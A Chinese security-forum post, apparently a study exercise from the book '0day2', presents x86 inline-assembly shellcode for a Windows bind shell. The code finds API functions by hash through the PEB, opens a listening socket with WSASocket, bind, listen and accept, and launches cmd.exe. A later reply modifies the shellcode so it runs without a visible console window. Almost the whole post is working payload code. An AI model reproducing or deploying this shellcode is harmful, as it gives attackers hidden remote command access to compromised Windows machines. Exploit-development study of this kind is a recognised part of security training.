[原创]旧书重温：0day2[6]bind_shell-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]旧书重温：0day2[6]bind_shell

发表于: 2013-12-17 18:19 4348

[原创]旧书重温：0day2[6]bind_shell

zhenwo

2013-12-17 18:19

4348

旧书重温：0day2【1】简单的缓冲区溢出案例 http://bbs.pediy.com/showthread.php?t=182497
旧书重温：0day2【2】实验：三种获取kernel32.dll基址的方法 http://bbs.pediy.com/showthread.php?t=182498
旧书重温：0day2【3】详细解读PEB法查找kener32地址 http://bbs.pediy.com/showthread.php?t=182499
旧书重温：0day2【4】动态获取函数地址 http://bbs.pediy.com/showthread.php?t=182520
旧书重温：0day2【5】shellcode变形记 http://bbs.pediy.com/showthread.php?t=182551
旧书重温：0day2【6】bind_shell http://bbs.pediy.com/showthread.php?t=182689

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

/*
LoadLibraryA             function`s hash is 0c917432
CreateProcessA           function`s hash is 6ba6bcc9
ExitProcess              function`s hash is 4fd18963
WSAStartup               function`s hash is 80b46a3d
WSASocketA               function`s hash is de78322d
bind                     function`s hash is dda71064
listen                     function`s hash is 4bd39f0c
accept                     function`s hash is 01971eb1
GetProcAddress           function`s hash is bbafdf85
Press any key to continue
 */
void bind_shell()
{
    //参考以前的代码
    __asm
    {
        CLD
        //存储hash
 
        push 0x80b46a3d                //WSAStartup
        push 0xde78322d                //WSASocket               
        push 0xdda71064                //bind
        push 0x4bd39f0c                //listen
        push 0x01971eb1                //accept
                                    //----------------------以上是ws2_32.dll中的函数
        push 0x0c917432                //load
        push 0x6ba6bcc9                //createProcessA
        push 0x4fd18963                //ExitProcess
                                    //-----------------------以上是kernel32.dll导出的函数
        mov esi,esp                    //esi = hash list 的顶 exitprocess  
        lea edi,[esi - 0x20]        //8个函数 *4 = 0x20     edi 指向 查找到的函数地址写入位置
         
        xor ebx,ebx                    
        mov bh,0x05                    
        sub esp,ebx                    //抬高堆栈  500h 保护 hash list
         
        mov bx,0x3233                //2 3
        push ebx
        push 0x5F327377                //_ 2 s w
        push  esp                    //ebp = "ws2_32"
        xor edx,edx
 
        mov ebx,fs:[edx+0x30]       //peb addr
        mov ecx,[ebx + 0x0c]        // ldr addr
        mov ecx,[ecx + 0x1c]        // list frist
 
        push edi
        push esi
 
next_module:
        mov ebp,[ecx+0x08]
        mov edi,[ecx+0x20]
        mov ecx,[ecx]
        cmp [edi + 12*2],dx
        jne next_module
         
        pop esi
        pop edi
 
 
find_lib_functions:
         
            lodsd                            //esi 所指定的字符 传送如eax
            cmp eax,0x01971eb1                //zhenw0
             
            jne find_functions                //如果 要查找accept的hash时 要切换dll了
            xchg ebp,eax
            call [edi - 0x04]                // edi - 0x0c 存放这LoadLibraryA的地址
            xchg ebp,eax            
             
find_functions:
            pushad
            mov eax,[ebp+0x3c]
            mov ecx,[ebp+eax+0x78]
            add ecx,ebp
            mov ebx,[ecx+0x20]
            add ebx,ebp
            xor edi,edi
             
next_function_loop:
            inc edi                        //zai exp 表中查找 函数
            mov esi,[ebx+edi*4]
            add esi,ebp
            cdq
             
hash_loop:                                //计算hash
            movsx eax,byte ptr[esi]
            cmp al,ah
            jz compare_hash                //如果到了 函数字符串的 00结尾就 比较hash至
            ror edx,7                    //右移7
            add edx,eax                    //
            inc esi
            jmp hash_loop
             
compare_hash:
            cmp edx,[esp+0x1c]        
            jnz next_function_loop
            mov ebx,[ecx+0x24]
            add ebx,ebp
            mov di,[ebx+2*edi]
            mov ebx,[ecx+0x1c]
            add ebx,ebp
            add ebp,[ebx +4*edi]
            xchg eax,ebp
            pop edi
            stosd
            push edi
            popad 
            cmp eax,0x80b46a3d                    //如果已经查找到最后一个hash了 就不跳转了
            jne find_lib_functions
             
function_call:        //函数都找到了 开始 scoket了
 
 
int 13　　　　　　　　　//便于od附加
 
 
         
 
 
 
    }
 
}

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

CLD
        //存储hash
 
         
                     
         
         
        push 0x01971eb1                //accept
        push 0x4bd39f0c                //listen
        push 0xdda71064                //bind
        push 0xde78322d                //WSASocket   
        push 0x80b46a3d                //WSAStartup
                                    //----------------------以上是ws2_32.dll中的函数
        push 0x0c917432                //load
        push 0x6ba6bcc9                //createProcessA
        push 0x4fd18963                //ExitProcess
                                    //-----------------------以上是kernel32.dll导出的函数
        mov esi,esp                    //esi = hash list 的顶 exitprocess  
        lea edi,[esi + 0x20]        //8个函数 *4 = 0x20     edi 指向 查找到的函数地址写入位置
         
        xor ebx,ebx                    
        mov bh,0x05                    
        sub esp,ebx                    //抬高堆栈  500h 保护 hash list
         
        mov bx,0x3233                //2 3
        push ebx
        push 0x5F327377                //_ 2 s w
        push  esp                    //ebp = "ws2_32"
        xor edx,edx
 
        mov ebx,fs:[edx+0x30]       //peb addr
        mov ecx,[ebx + 0x0c]        // ldr addr
        mov ecx,[ecx + 0x1c]        // list frist
 
        push edi
        push esi
 
next_module:
        mov ebp,[ecx+0x08]
        mov edi,[ecx+0x20]
        mov ecx,[ecx]
        cmp [edi + 12*2],dx
        jne next_module
         
        pop esi
        pop edi
 
 
find_lib_functions:
         
            lodsd                            //esi 所指定的字符 传送如eax
            cmp eax,0x80b46a3d                //zhenw0
             
            jne find_functions                //如果 要查找accept的hash时 要切换dll了
            xchg ebp,eax
            call [edi - 0x04]                // edi - 0x0c 存放这LoadLibraryA的地址
            xchg ebp,eax            
             
find_functions:
            pushad
            mov eax,[ebp+0x3c]
            mov ecx,[ebp+eax+0x78]
            add ecx,ebp
            mov ebx,[ecx+0x20]
            add ebx,ebp
            xor edi,edi
             
next_function_loop:
            inc edi                        //zai exp 表中查找 函数
            mov esi,[ebx+edi*4]
            add esi,ebp
            cdq
             
hash_loop:                                //计算hash
            movsx eax,byte ptr[esi]
            cmp al,ah
            jz compare_hash                //如果到了 函数字符串的 00结尾就 比较hash至
            ror edx,7                    //右移7
            add edx,eax                    //
            inc esi
            jmp hash_loop
             
compare_hash:
            cmp edx,[esp+0x1c]        
            jnz next_function_loop
            mov ebx,[ecx+0x24]
            add ebx,ebp
            mov di,[ebx+2*edi]
            mov ebx,[ecx+0x1c]
            add ebx,ebp
            add ebp,[ebx +4*edi]
            xchg eax,ebp
            pop edi
            stosd
            push edi
            popad 
            cmp eax,0x01971eb1                    //如果已经查找到最后一个hash了 就不跳转了
            jne find_lib_functions
             
function_call:        //函数都找到了 开始 scoket了
 
            add esi,0x0c        
 
            //mov eax,[esi]
    //--------------------------------------------------wsastartup(dword,lpwsadata)
            //std
            //std
            push esp
            push 0x02
            lodsd
            call eax
    // eax = 0 可以使用eax填充数据
    //-------------------------------------------------WSASocketA(af,type ...)
             
            mov ecx,0x50
            mov edi,esp
            rep stosd
             
            inc eax //eax = 1
            push eax
            inc eax
            push eax
            lodsd
            call eax
            xchg ebp,eax        // ebp = socket handle
             
    //--------------------------------------------------------bind
            mov eax,0x0a1aff02
            xor ah,ah
            push eax
            push esp
call_loop:                // bind() listen() accept() dou zai zhe li
            push ebp
            lodsd
            call eax
            test eax,eax
            jz call_loop
             
            //初始化，startpinfo
            inc byte ptr [esp+0x2d]
            lea edi,[esp+0x38]
            stosd
            stosd
            stosd
                 
            pop eax
 
 
            push esp
            push esp
            push eax
            push eax
            push eax
            push esp
            push eax
            push eax
            //int 3
            //////////cmd
             
            mov dword ptr [esi],0x646d63
            push esi 
             
            ///////////////
            push eax
             
             
         
 
            call [esi-0x1c]
 
            call [esi-0x20]

登录后可查看完整内容

[注意]看雪招聘，专注安全领域的专业人才平台！

收藏・6

免费・5

支持

赞赏记录

参与人

雪币

留言

时间

心游尘世外

为你点赞~

2024-5-31 07:13

QinBeast

为你点赞~

2024-5-31 07:03

飘零丶

为你点赞~

2024-5-31 01:35

shinratensei

为你点赞~

2024-5-31 01:20

PLEBFE

为你点赞~

2023-3-5 04:15

最新回复 (2)
cqzj70 雪币： 77 活跃值： (53) 能力值： ( LV2，RANK：10 ) 在线值：发帖 24 回帖 325 粉丝 0 关注私信	cqzj70 2 楼 mark 2014-3-3 09:25 0
blackwhite 雪币： 411 活跃值： (262) 能力值： ( LV4，RANK：50 ) 在线值：发帖 31 回帖 247 粉丝 3 关注私信	blackwhite 1 3 楼改了下楼主的SC，你的要跳黑框，改了下不跳了 push esp push esp push eax push eax push eax push esp push eax push eax //int 3 //////////cmd mov dword ptr [esi],0x11646d63 mov byte ptr [esi+0x03],bl push esi /////////////// push eax call [esi-0x1c] 要改成 push esp push esp push eax push eax mov al,08 shl eax,18h push eax xor eax,eax push esp push eax push eax //int 3 //////////cmd mov dword ptr [esi],0x11646d63 mov byte ptr [esi+0x03],bl push esi /////////////// push eax call [esi-0x1c] 2015-11-26 16:29 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

zhenwo

发帖

246

回帖

180

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (2)
cqzj70 雪币： 77 活跃值： (53) 能力值： ( LV2，RANK：10 ) 在线值：发帖 24 回帖 325 粉丝 0 关注私信	cqzj70 2 楼 mark 2014-3-3 09:25 0
blackwhite 雪币： 411 活跃值： (262) 能力值： ( LV4，RANK：50 ) 在线值：发帖 31 回帖 247 粉丝 3 关注私信	blackwhite 1 3 楼改了下楼主的SC，你的要跳黑框，改了下不跳了 push esp push esp push eax push eax push eax push esp push eax push eax //int 3 //////////cmd mov dword ptr [esi],0x11646d63 mov byte ptr [esi+0x03],bl push esi /////////////// push eax call [esi-0x1c] 要改成 push esp push esp push eax push eax mov al,08 shl eax,18h push eax xor eax,eax push esp push eax push eax //int 3 //////////cmd mov dword ptr [esi],0x11646d63 mov byte ptr [esi+0x03],bl push esi /////////////// push eax call [esi-0x1c] 2015-11-26 16:29 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]旧书重温：0day2[6]bind_shell

账号登录 验证码登录

账号登录

验证码登录